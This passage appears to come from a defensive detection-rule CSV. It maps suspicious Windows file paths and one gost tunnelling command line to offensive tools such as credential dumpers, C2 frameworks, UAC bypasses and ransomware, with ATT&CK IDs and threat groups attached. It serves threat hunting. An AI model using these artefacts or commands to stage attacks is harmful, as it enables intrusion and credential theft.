"*c:\pwned.txt*",".{0,1000}c\:\\pwned\.txt.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","0","N/A","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","36577" "*c:\pwned_exec.txt*",".{0,1000}c\:\\pwned_exec\.txt.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","0","N/A","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","36578" 
"*C:\SPRAY_*.dmp*",".{0,1000}C\:\\SPRAY_.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","0","N/A","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","36579" "*C:\Temp\*-*.kirbi*",".{0,1000}C\:\\Temp\\.{0,1000}\-.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","0","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","36580" "*C:\temp\c2.pdf*",".{0,1000}C\:\\temp\\c2\.pdf.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","36581" "*C:\Temp\C3Store*",".{0,1000}C\:\\Temp\\C3Store.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. 
Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","N/A","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","36582" "*C:\Temp\file.exe*",".{0,1000}C\:\\Temp\\file\.exe.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","10","10","1185","143","2024-06-01T16:46:57Z","2020-10-08T11:22:26Z","36583" "*c:\temp\history.csv*",".{0,1000}c\:\\temp\\history\.csv.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","36584" "*c:\temp\history.html*",".{0,1000}c\:\\temp\\history\.html.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","36585" "*c:\temp\history.txt*",".{0,1000}c\:\\temp\\history\.txt.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - 
TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","36586" "*C:\temp\iamahacker.txt*",".{0,1000}C\:\\temp\\iamahacker\.txt.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","36587" "*c:\temp\nc.exe*",".{0,1000}c\:\\temp\\nc\.exe.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","36588" "*C:\Temp\poc.txt*",".{0,1000}C\:\\Temp\\poc\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","New Lateral Movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 
- T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/ServiceMove-BOF","1","0","N/A","N/A","10","10","291","48","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z","36589" "*c:\temp\something.ps1*",".{0,1000}c\:\\temp\\something\.ps1.{0,1000}","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","0","N/A","N/A","8","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","36590" "*C:\temp\testlog\mylogdddd.blf.blf*",".{0,1000}C\:\\temp\\testlog\\mylogdddd\.blf\.blf.{0,1000}","offensive_tool_keyword","POC","Windows Privilege escalation POC exploitation for CVE-2024-49138","T1068 - T1058 - T1203","TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/emdnaia/CVE-2024-49138-POC","1","0","N/A","N/A","9","1","1","0","2025-01-15T01:01:21Z","2025-01-15T02:11:49Z","36591" "*C:\temp\tmp.tmp*",".{0,1000}C\:\\temp\\tmp\.tmp.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","36592" "*C:\Uac\results.cab*",".{0,1000}C\:\\Uac\\results\.cab.{0,1000}","offensive_tool_keyword","IDiagnosticProfileUAC","UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/Wh04m1001/IDiagnosticProfileUAC","1","0","N/A","N/A","10","2","182","32","2022-07-02T20:31:47Z","2022-07-02T19:55:42Z","36593" "*C:\Users\*\AppData\Local\Temp\performance_636_3000_1.dll*",".{0,1000}C\:\\Users\\.{0,1000}\\AppData\\Local\\Temp\\performance_636_3000_1\.dll.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2008R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","N/A","10","5","419","75","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z","36594" "*C:\Users\*\AppData\Roaming\Indexing.*",".{0,1000}C\:\\Users\\.{0,1000}\\AppData\\Roaming\\Indexing\..{0,1000}","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. 
On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","36595" "*C:\Users\*\AppData\Roaming\svchost.exe*",".{0,1000}C\:\\Users\\.{0,1000}\\AppData\\Roaming\\svchost\.exe.{0,1000}","offensive_tool_keyword","chaos","Chaos ransomware behavior","T1486","TA0040","chaos ransomware","N/A","Ransomware","https://blog.qualys.com/vulnerabilities-threat-research/2022/01/17/the-chaos-ransomware-can-be-ravaging","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","36596" "*C:\Users\*\lsass_*.dmp*",".{0,1000}C\:\\Users\\.{0,1000}\\lsass_.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","DumpNParse","A Combination LSASS Dumper and LSASS Parser","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/icyguider/DumpNParse","1","0","N/A","N/A","10","2","150","24","2021-11-21T14:25:24Z","2021-11-21T14:18:42Z","36597" "*C:\Users\cyberstair\*",".{0,1000}C\:\\Users\\cyberstair\\.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","36598" "*c:\users\public\*.dll*",".{0,1000}c\:\\users\\public\\.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","_","dll file in public user folder","T1036 - T1055 - T1574","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://detect.fyi/rhysida-ransomware-and-the-detection-opportunities-3599e9a02bb2","1","0","N/A","observed with PortStarter DLL","10","10","N/A","N/A","N/A","N/A","36600" 
"*C:\Users\Public\*.dmp*",".{0,1000}C\:\\Users\\Public\\.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","36601" "*C:\Users\Public\backup.enc*",".{0,1000}C\:\\Users\\Public\\backup\.enc.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","N/A","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","36602" "*c:\users\public\creds.log*",".{0,1000}c\:\\users\\public\\creds\.log.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","N/A","9","1","11","2","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z","36603" "*c:\Users\Public\Documents\log.txt*",".{0,1000}c\:\\Users\\Public\\Documents\\log\.txt.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","36604" "*C:\Users\Public\example.txt*",".{0,1000}C\:\\Users\\Public\\example\.txt.{0,1000}","offensive_tool_keyword","POC","Local Privilege Escalation from Admin to Kernel vulnerability on Windows 10 and Windows 11 operating systems with HVCI enabled.","T1055.011 - 
T1548.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/hakaioffsec/CVE-2024-21338","1","0","N/A","N/A","9","3","292","60","2024-04-16T21:00:14Z","2024-04-13T05:53:02Z","36605" "*c:\users\public\output.txt*",".{0,1000}c\:\\users\\public\\output\.txt.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","N/A","9","1","11","2","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z","36606" "*C:\Users\Public\perm.txt*",".{0,1000}C\:\\Users\\Public\\perm\.txt.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","0","N/A","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","36607" "*C:\Users\Public\syslog.dat*",".{0,1000}C\:\\Users\\Public\\syslog\.dat.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","N/A","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","36608" "*C:\Users\Public\syslog.zip*",".{0,1000}C\:\\Users\\Public\\syslog\.zip.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","N/A","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","36609" "*C:\Users\Public\test.txt*",".{0,1000}C\:\\Users\\Public\\test\.txt.{0,1000}","offensive_tool_keyword","CheeseTools","tools for 
Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","0","N/A","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","36610" "*C:\Users\username\command_log.txt*",".{0,1000}C\:\\Users\\username\\command_log\.txt.{0,1000}","offensive_tool_keyword","Checkmate","payload Execution by Fake Windows SmartScreen with requires Administrator privileges & Turn off real SmartScreen Filter","T1059 - T1070 - T1546","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/S3N4T0R-0X0/Checkmate","1","0","#content","N/A","9","1","95","16","2024-01-12T19:03:45Z","2024-01-04T15:56:37Z","36611" "*C:\Users\username\payload.exe*",".{0,1000}C\:\\Users\\username\\payload\.exe.{0,1000}","offensive_tool_keyword","Checkmate","payload Execution by Fake Windows SmartScreen with requires Administrator privileges & Turn off real SmartScreen Filter","T1059 - T1070 - T1546","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/S3N4T0R-0X0/Checkmate","1","0","#content","N/A","9","1","95","16","2024-01-12T19:03:45Z","2024-01-04T15:56:37Z","36612" "*C:\Windows \System32*",".{0,1000}C\:\\Windows\s\\System32.{0,1000}","offensive_tool_keyword","_","Bypass UAC by Mocking Trusted Directories","T1548.002","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","suspicious path","10","10","N/A","N/A","N/A","N/A","36613" "*C:\Windows\DirectX.log*\Windows\Temp\backup.log*",".{0,1000}C\:\\Windows\\DirectX\.log.{0,1000}\\Windows\\Temp\\backup\.log.{0,1000}","offensive_tool_keyword","Shellcode-Loader","dynamic shellcode loading","T1055 - T1055.012 - T1027 - T1027.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ReversingID/Shellcode-Loader","1","0","N/A","N/A","10","3","244","44","2025-01-25T16:30:56Z","2021-08-08T08:53:03Z","36615" "*C:\Windows\System.exe* -L rtcp://0.0.0.0:8087/127.0.0.1:4444 -F 
socks5://*:*@*:443*",".{0,1000}C\:\\Windows\\System\.exe.{0,1000}\s\-L\srtcp\:\/\/0\.0\.0\.0\:8087\/127\.0\.0\.1\:4444\s\-F\ssocks5\:\/\/.{0,1000}\:.{0,1000}\@.{0,1000}\:443.{0,1000}","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","Dispossessor - EMBER BEAR","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","N/A","10","16646","2539","2024-12-31T13:08:51Z","2015-03-20T09:45:08Z","36617" "*C:\Windows\system32\cmd.exe /c C:\Windows\Sysnative\bcdedit.exe 1> bcdedit 2>&1*",".{0,1000}C\:\\Windows\\system32\\cmd\.exe\s\/c\sC\:\\Windows\\Sysnative\\bcdedit\.exe\s1\>\sbcdedit\s2\>\&1.{0,1000}","offensive_tool_keyword","Smbtouch-Scanner","Smbtouch detect whether the target is vulnerable of one of these vulnerabilities: ETERNALBLUE - ETERNALCHAMPION - ETERNALROMANCE - ETERNALSYNERGY","T1210 - T1046 - T1133","TA0007 - TA0043 - TA0008","N/A","APT15 - Turla","Lateral Movement","https://github.com/3gstudent/Smbtouch-Scanner","1","0","N/A","N/A","10","2","140","66","2021-04-17T01:42:06Z","2017-04-21T01:38:55Z","36618" "*c:\windows\temp\blah.txt*",".{0,1000}c\:\\windows\\temp\\blah\.txt.{0,1000}","offensive_tool_keyword","PowerUpSQL","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Black Basta","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","PowerUpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","36621" 
"*c:\windows\temp\blah.txt*",".{0,1000}c\:\\windows\\temp\\blah\.txt.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","PowerUpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","36622" "*C:\windows\temp\Coredump.dmp*",".{0,1000}C\:\\windows\\temp\\Coredump\.dmp.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","36623" "*C:\Windows\Temp\move.exe*",".{0,1000}C\:\\Windows\\Temp\\move\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Lateral 
Movement","https://github.com/0xthirteen/MoveKit","1","0","N/A","N/A","10","7","666","109","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z","36624" "*C:\Windows\Temp\moveme.exe*",".{0,1000}C\:\\Windows\\Temp\\moveme\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","0","N/A","N/A","10","7","666","109","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z","36625" "*c:\windows\temp\test.tmp farmer*",".{0,1000}c\:\\windows\\temp\\test\.tmp\sfarmer.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","N/A","10","4","379","61","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z","36626" "*c:\windows\temp\test1.txt*",".{0,1000}c\:\\windows\\temp\\test1\.txt.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","36627" "*c:\windows\temp\test2.txt*",".{0,1000}c\:\\windows\\temp\\test2\.txt.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","36628" "*c:\windows\temp\test3.txt*",".{0,1000}c\:\\windows\\temp\\test3\.txt.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","36629" "*C??/generator.cpp*",".{0,1000}C\?\?\/generator\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira 
